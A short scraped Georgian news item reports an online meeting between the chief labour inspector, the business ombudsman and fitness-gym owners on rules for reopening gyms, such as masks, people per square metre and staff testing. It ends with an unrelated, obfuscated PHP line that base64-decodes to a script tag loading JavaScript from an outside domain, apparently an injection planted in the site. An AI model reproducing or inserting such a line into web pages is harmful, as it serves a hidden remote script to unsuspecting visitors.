celsiusi
ავერსი საქკაბელი

ქვეყნის მთავარი შრომის ინსპექტორი ბიზნესომბუდსმენთან ერთად, ფიტნეს დარბაზების წარმომადგენლებს შეხვდა. 

როგორც "ბიზნესთაიმს" შრომის ისპექციის დეპარტამენტიდან აცნობეს, ონლაინ ფორმატში გამართულ შეხვედრაზე სპორტულ-გამაჯანსაღებელი დაწესებულებების ფუნქციონირების აღდგენისთვის საჭირო რეგულაციებზე იმსჯელეს. 
 
განიხილეს ფიზიკური აქტივობების პირბადით წარმართვის შესაძლებლობი,  სავარჯიშო სივრცეში კვადრატულ მეტრზე დასაშვებ პირთა და პერმანენტულად, ფიტნეს-დარბაზებში  დასაქმებულთა გასატესტი მინიმალური რაოდენობა.  
სპორტულ-გამაჯანსაღებელი ბიზნესის წარმომადგენლებთან შეხვედრა დარგის ფუნქციონირების მდგრად აღდგენას ისახავს მიზნად.
1510
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");